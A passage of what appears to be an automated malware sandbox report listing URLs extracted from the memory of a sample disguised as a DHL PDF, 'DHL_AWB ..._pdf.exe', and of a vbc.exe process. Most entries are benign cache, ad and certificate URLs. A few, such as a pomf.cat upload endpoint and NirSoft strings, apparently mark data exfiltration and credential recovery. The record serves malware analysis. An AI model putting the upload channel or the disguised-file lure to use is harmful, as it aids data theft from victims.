            Source: bhvE48A.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.comodoca.com09
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0:
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0B
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0E
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0F
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0K
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0M
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0R
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gsr202
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://ocsp2.globalsign.com/cloudsslsha2g30V
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pagead2.googlesyndication.com/pagead/js/r20190624/r20190131/show_ads_impl.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&euconsent=BOi01ZPOi01ZPAcABBENB4-AAA
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&gdpr_consent=BOi01ZPOi01ZPAcABBENB4-
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: http://s.amazon-adsystem.com/v3/pr?exlist=an&fv=1.0&a=cm&cm3ppd=1
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: http://s.amazon-adsystem.com/x/da2e6c890e6e3636
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://sb.scorecardresearch.com/beacon.js
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://secure.globalsign.com/cacert/cloudsslsha2g3.crt06
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/44/c08e43.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/52/8adb60.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/8c/865070.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/95/8bd8bf.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsWyr.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuMD0.img?h=333&w=311
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBGjoVB.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbOGs.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPRPvf.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBSDdmG.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBTrj40.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVBUge.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVQ7lO.img?h=50&w=50&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://t.wayfair.com/a/vendor_sync/user?vendor_id=1&uid=3011883223893104794&t=1
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://trc.taboola.com/p3p.xml
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000003.253368565.0000000001A9B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn01
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.googleadservices.com/pagead/p3p.xml
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
            Source: bhvE48A.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
            Source: vbc.exe, 0000000B.00000002.301955681.000000000019C000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: vbc.exe, vbc.exe, 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
            Source: vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
            Source: vbc.exe, 0000000B.00000003.298884319.00000000021AE000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000002.302301690.00000000021AA000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1res://C:
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/79/227/59/931bcbc9-c308-445b-ac87-70a69b051455.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x194/2/100/237/97/93b3dc40-172c-479f-bf5a-5d49e8538bf9.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/2/100/237/97/93b3dc40-172c-479f-bf5a-5d49e8538bf9.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBEB4CB72
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:300
